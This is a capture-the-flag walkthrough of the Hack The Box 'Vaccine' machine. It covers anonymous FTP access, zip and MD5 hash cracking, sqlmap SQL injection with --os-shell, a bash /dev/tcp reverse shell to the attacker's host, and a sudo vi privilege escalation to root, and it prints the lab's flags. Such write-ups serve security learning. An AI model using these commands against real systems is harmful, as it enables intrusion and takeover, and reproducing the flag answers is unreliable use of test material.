This article discusses the solution for Hack the Box Vaccine Challenge tasks so proceed with caution.

I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.

Vaccine Solution

Besides SSH and HTTP, what other service is hosted on this box?

1. Run an nmap scan with the -sV (version of services) -sC(default scripts for service discovery and vulnerability detection)

    nmap -sV -sC {target_machine_ip}
    nmap -sC -sV 10.129.251.21
   

Answer: ftp

This service can be configured to allow login with any password for specific username. What is that username?

As with the nmap results above the sC option was able to determine that Anonymous FTP login allowed. If you do a google search the username for this is usually anonymous

anonymous

What is the name of the file downloaded over this service?

1. Let's connect via ftp

ftp {target_machine_ip}

2. For username just use anonymous and just enter blank password.

3. Enter ls and you will find backup.zip

4. Run getbackup.zip

Answer:backup.zip

What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?

1. We try to unzip the backup.zip however a password is required.

   

2. Do a quick google search and you will find the answer

Answer: zip2john

What is the password for the admin user on the website?

1. Let's run the zip2john script to crack the password. First let's obtain the password hashes.

    zip2john backup.zip > zip.txt
   

   

2. Then let's crack the password for the backup.zip

    john zip.txt
   

   

3. Now let's unzip backup.zip with the password 741852963. This gives us two files index.php and style.css

    unzip backup.zip
   

4. Now let's investigate the index.php vim index.php. Here we find a hashed password 2cb42f8734ea607eefed3b70af13bbd3 for the username admin.

5. Let's analyze the hash type by going on any hash analyzer. We use https://hashes.com/en/tools/hash_identifier in this case and find that it is MD5 format.

   

6. Create a file called admin-hash.txt then insert the hash found in the previous step. Let's crack the hash password using john

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 admin-hash.txt

Answer: qwerty789

What option can be passed to sqlmap to try to get command execution via the sql injection?

1. Login using username admin and password qwerty789

2. Go to browser and get the cookie PHPSESSID value

3. Next as we view with the page after we login, we can see one possible form to attack with SQL injection. We observe that submitting it appends a query parameter search

4. Let's use sqlmap and run the following.

sqlmap -u "http://{target_ip}/dashboard.php?search=test" --cookie="PHPSESSID={cookie_value}"

sqlmap -u "http://{target_ip}/dashboard.php?search=test" --cookie="PHPSESSID={cookie_value}" --os-shell

5. We have spawned a os-shell with user postgres. However executing sudo -l does not yield any meaningful results. The os-shell is limited in commands it can execute. It is not interactive

6. Let's go to our attack machine and create a netcat listner server

  nc -lvnp 5000

7. On our target machine running sqlmap os-shell let's connect to our server to spawn a reverse shell.

 bash -c  "bash -i >& /dev/tcp/{attack_machine_ip}/5000  0>&1"

8. We have spawned a reverse shell however we do not have an interactive shell yet.

9. Run the following to have an interactive shell.

python3 -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo
export TERM=xterm

10. We now have an interactive shell. Hovever we have to know the password of user postgres to run sudo -l

11. We have to find the password in the system. And since this server running a website, one of the places we can look at is /var/www/

12. Let's explore each of the files in the html folder. Under the dashboard.php file we find.

13. We test this password by using it for the password prompt for sudo -l Where we find that we have sudo rights for vi program.

Answer: vi

Submit user flag

1. Our connection via reverse shell is always being disconnected from the server. Since we know the password (P@s5w0rd!) of the user postgres, let's just connect via ssh.

    ssh postgres@{target_machine_ip}
   

2. Run cd ~/ to go to postgres user's folder to see if there is something interesting. In here we will find user.txt

Answer:ec9b13ca4d6229cd5cc1e09980965bf7

Submit the root flag

1. Continuing with our terminal established via ssh connnection in the previous section. We know that our current postgres user has sudo privileges for vi. Now let's attempt priviledge escalation.

2. Let's go to https://gtfobins.github.io/gtfobins/vi/#shell to check if we can run a command to escalte our privileges to root.

3. Run the following:

     sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
   

   

4. Then execute the following from inside vi based on GTFOBins

    :set shell=/bin/sh
    :shell
   

5. Now we have escalated our privileges and have a shell with root privileges. Now let's look for root.txt

    find / -type f -name "root.txt"
   

6. Now let's look at the file to get flag

    vi /root/root.txt
   

Answer: ddd6e058e814260bc70e9bbdef2715849

Until next time. Keep learning.

Stay stoked and code. :)

---

I hope you can voluntarily Buy Me A Coffee if you found this article useful and give additional support for me to continue sharing more content for the community. :)

Thank you very much. :)